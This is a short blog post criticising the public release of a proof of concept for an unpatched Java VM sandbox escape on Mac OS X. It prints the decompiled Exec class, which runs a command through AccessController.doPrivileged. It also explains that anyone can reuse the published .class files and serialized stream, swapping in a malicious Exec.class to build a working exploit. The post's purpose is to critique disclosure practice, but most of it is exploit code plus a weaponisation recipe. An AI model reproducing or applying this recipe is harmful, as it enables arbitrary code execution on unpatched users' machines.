Unresponsible Disclosure: The MacOS X Java Bug
Landon Fuller decided to publish a proof of concept for a Sun Java VM vulnerability, that is still unpatched on Mac OS X. I agree that after this timespan, it was neccessary to demonstrate how easy it is to exploit this vulnerability; however, he decided to make it trivial to build your own exploit from it.
You can easily fetch HelloWorldApplet.class from his page and look at a decompiled version by JAD. He uses his own loader package fun.FunLoader, so grab fun/FunLoader.class as well. HelloWorldApplet also uses javax/Exec.class and Exec$1.class, and if we decompile that, it is trivial to spot, how to craft your own exploit:
package javax;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class Exec
{
public Exec()
{
try
{
final String cmd[] = {
"/usr/bin/say", "I am executing an innocuous user process"
};
AccessController.doPrivileged(new PrivilegedExceptionAction() {
public Object run()
throws Exception
{
Runtime.getRuntime().exec(cmd);
return null;
}
final String val$cmd[];
final Exec this$0;
{
this$0 = Exec.this;
cmd = as;
super();
}
});
}
catch(Exception exception)
{
throw new RuntimeException("Exec failed", exception);
}
}
}
You can even recycle all .class files and his t.tmp serialized input stream, just replace Exec.class in your local copy with your malicious payload.
Now this is unresponsible disclosure if it is so dead-easy to build your own exploit from it, it's almost easier than writing a custom shellcode for an existing exploit.
Labels: exploitation, malware
